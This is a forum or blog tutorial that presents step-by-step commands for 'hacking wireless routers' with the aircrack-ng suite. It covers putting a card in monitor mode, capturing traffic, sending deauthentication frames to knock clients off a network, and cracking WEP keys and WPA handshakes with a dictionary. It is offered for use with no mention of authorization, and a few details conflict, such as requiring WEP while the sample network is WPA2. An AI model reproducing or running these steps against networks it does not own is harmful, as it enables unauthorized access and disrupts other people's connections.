Kartikey Sapra
Author ti.teg.tnod.I

Note: This tutorial contains little fail safes - if you run into a problem you can try to post but Google is probably the best option

This is a simple guide on hacking wireless routers with WPA/WEP security using aircrack-ng on Linux by ti.teg.tnod.I. Everything in this guide may work on Windows but is untested...

Whenever I refer to a device/SSID/etc please just fill it in with the information YOU have gathered.


Okay the first thing you should do (Unless you already know your wireless device's name) is run "iwconfig" to get the name of your wireless device. You should see something like this show up:

lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11bg ESSID:"dlink"
Mode:Managed Frequency:2.437 GHz Access Point: 00:1E:58:02:00:40
Bit Rate=54 Mb/s Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Power Management:off
Link Quality=63/100 Signal level:-48 dBm Noise level=-68 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

pan0 no wireless extensions.
(All commands from here on will need root access)

In this case the wireless device is "wlan0". So the next thing you need to do is put that device into "monitor mode". This mode should allow you to observe what's going on around you. You can do this by running:

airmon-ng start wlan0
Which should return something similar to:

Interface Chipset Driver

wlan0 Broadcom 43xx b43 - [phy0]
(monitor mode enabled on mon0)
What we want to know is "mon0" which is the device we will use. Now we want to know what's going on around us...In order to do that we need to run:

airodump-ng mon0
This should display a window that's pretty self explanatory it should look like this:

CH 2 ][ Elapsed: 44 s ][ 2009-03-19 20:21


00:1E:58:02:00:40 204 129 46 0 6 54. WPA2 CCMP PSK dlink

BSSID STATION PWR Rate Lost Packets Probes

00:1E:58:02:00:40 00:16:CF:1A88 0 1- 0 0 56 dlink
(not associated) 00:1F:3B:22:09:E3 196 0- 1 8 9 dlink
Now see " 00:1E:58:02:00:40 204 129 46 0 6 54. WPA2 CCMP PSK dlink "? The 46 is the amount of IVs obtained (Used for cracking the password), the 0 is the amount of IVs obtained a second, the WPA2 is the type of security used (You need this to be WEP for this tutorial), and "00:1E:58:02:00:40" is the router's BSSID. The clients are listed in the lower section. Now you should note the channel the router is connected to (In this case it's 6). After you have done that you should terminate airodump-ng to free resources, closing the terminal won't do anything so run something like "killall airodump-ng" (Needs root). Okay after you've terminated the previous airodump-ng run:

airodump-ng -c 6 --bssid 00:13:A3:0B:98:83 -w dump mon0
This is pretty self explanatory in my opinion, the "6" is the channel, the "00:13:A3:0B:98:83" is the BSSID of the router, "dump" is the prefix of the dump file (You'd be fine not touching that), and mon0 is the device. Now you should see a screen similar to the previous screen just maybe with less clutter. Now airodump-ng is only looking for connections from that channel and router and logging all the IVs to a file.

You probably want to wait until the amount of "data" you've collected reaches 30 000 - 80 000 before trying to crack the password. If it's going slowly (0-1 IVs a second) try deauthenticating the client for IVs...There may be a better way than doing this but this method is the best method I know of that works. To deauthenticate a client first get their MAC address (Located under "STATION") and then run:

aireplay-ng -0 70 -a 00:13:A3:0B:98:83 -c 00:1A:73:FA:1C:12 mon0
Okay the -0 means deauthentication, the 70 is how many deauths to send (You probably want 50-100, don't set a large number such as 1024 as the client may stop replying IVs for a bit.), "00:13:A3:0B:98:83" is the BSSID of the access point, "00:1A:73:FA:1C:12" is the MAC address of the client you're deauthing, and mon0 is the device. You shouldn't run this if you're already getting an alright amount of IVs (More than 0 a second) though as it could slow down the process. You may run this as many times as needed.

Now finally if you think you have enough IVs (If you don't you can always repeat this step) you can make an attempt at the password:

aircrack-ng -b 00:13:A3:0B:98:83 dump-01.cap
Okay "00:13:A3:0B:98:83" is the BSSID of the router and "dump-01.cap" is the file where the IVs are located, alternatively you may run something like:

aircrack-ng -b 00:13:A3:0B:98:83 dump*.cap
That will include all the IV files with the prefix "dump" if you've separated them. If aircrack-ng seems to hang and doesn't fix itself within 45-60 seconds then feel free to terminate it and try again after another 5000-10 000 IVs.

I hope this guide is clear...Any questions or comments feel free to post or PM me. I will do the WPA summary later but this is a quick breakdown (Which is just a list of commands really)

sudo airmon-ng start wlan0
#Get the MAC address of your access point (00:1E:58:02:00:40)
#Channel 6 (2.437GHz)
sudo airodump-ng -c 6 --bssid 00:1E:58:02:00:40 -w psk mon0
# -0 means deauthentication
# 1 is the number of deauths to send (you can send multiple if you wish)
# -a 00:14:6C:7E:40:80 is the MAC address of the access point
# -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
sudo aireplay-ng -0 1 -a 00:1E:58:02:00:40 -c 00:1A:73:FA:1C:12 mon0
sudo aircrack-ng -w dictionary_english.dic -b 00:1E:58:02:00:40 psk*.cap
0 Responses

Post a Comment